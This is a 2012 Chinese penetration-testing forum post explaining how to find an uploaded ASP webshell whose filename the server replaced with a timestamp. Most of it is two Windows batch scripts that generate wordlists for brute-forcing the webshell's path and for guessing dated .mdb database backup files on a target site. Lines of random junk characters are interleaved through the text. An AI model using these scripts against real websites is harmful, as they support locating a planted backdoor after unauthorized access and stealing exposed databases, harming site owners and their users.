中国网络渗透测试联盟
标题:
针对上传木马找不到名字的解决办法
[打印本页]
作者:
admin
时间:
2012-9-5 15:04
标题:
针对上传木马找不到名字的解决办法
今天在一个人博客里面看到的,地址是:
http://www.0xsec.com/?p=260
% q* ^: }# [' {1 e9 E$ f4 ]
7 B! D+ Q2 G& J5 A
感觉思路蛮好的,而且在t00ls也没有找到相关文章,我就转过来给大家瞧瞧!
# t6 y: z0 W' v9 X `$ K) k
9 I2 K3 b+ s$ t- U. j9 `4 b
——————————————————–
1 |. k3 \, m$ r5 D
有时 传了 木马上去后 直接是 xiaoma.asp
/ R. |$ j! i3 E' k
还有种 是按照时间生成名字如201103091**************.asp
* d- t9 O6 E6 i2 J/ S
下面这种如果又 没有回显的话 就可以做 个字典扫
3 R% v) u, _& p1 s; G5 L
生成字典
1 a- _3 S* A s1 K# K6 d5 ]
uploadfile/2011/1/1/2011012847000000.asp
. [% a, A- |* h) l+ {: }' i
uploadfile/2011/1/1/2011012847000001.asp
% Q( g0 L6 b6 A
uploadfile/2011/1/1/2011012847000002.asp
! }* T H6 b+ C
uploadfile/2011/1/1/2011012847000003.asp
8 y, I0 r- ?) K. h
uploadfile/2011/1/1/2011012847000004.asp
9 H, b5 _0 W" \( M0 s
——————————————————-
; P' R3 L$ v5 J) B8 F
建议只 生成 上传 那1分种左右 如果你电脑 与网站服务器时间差距太大 就 多做点
( S- m3 V. W- L( y4 B
@echo off
3 i( Y; q) O6 s1 z! X! t
for %%a in (2011012847) do (
* l d# w: F" P& @% x! P( h$ h
for %%o in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28) do (
3 @/ o4 O+ Y6 R& y5 O# G
for %%b in (0 1 2 3 4 5 6 7 8 9) do (
- A0 J) s& F9 x2 [0 `
for %%c in (0 1 2 3 4 5 6 7 8 9) do (
4 T) h* i" F1 F( y. I
for %%d in (0 1 2 3 4 5 6 7 8 9) do (
' J5 d4 h! f0 y+ N$ h- u5 b5 l8 N& D
for %%e in (0 1 2 3 4 5 6 7 8 9) do (
5 B8 n, S+ t) b; T
for %%f in (0 1 2 3 4 5 6 7 8 9) do (
7 M9 A0 m; M, L1 Y( A# O7 O
for %%g in (0 1 2 3 4 5 6 7 8 9) do (
/ t: F8 |+ H2 ]+ l
echo uploadfile/2011/1/%%o/%%a%%b%%c%%d%%e%%f%%g.asp >>data.log
. H3 `7 R2 E# z9 @3 _5 Z, @- l
))))))))
3 {) b0 a7 t2 [8 b% b0 Y: \
代码 如上 自己修改即可。 便有了小马的路径。方法不错。值得欣赏。
~1 G6 F" N+ o4 w
由此思路修改可以针对数据库备份扫描。
- h F$ H6 t/ ^- k$ r2 o. ?
恩不错,还可以写个时间备份数据库文件扫描
. b3 d' s' M+ @$ L! v9 o5 o$ Y2 |
@echo off
+ m' ` Y n4 E( Y3 c
for %%a in (2007 2008 2009 2010) do (
3 L, c j" Y: {, K! H/ `
for %%b in (1 2 3 4 5 6 7 8 9 10 11 12) do (
8 i Q2 q6 X4 _7 v( b
for %%c in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31) do (
9 R9 F. K- t; n" U5 K( `
echo databackup/%%a-%%b-%%c.mdb >>data.log
3 |) [. z/ a9 j4 I& B" V. L
)))
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2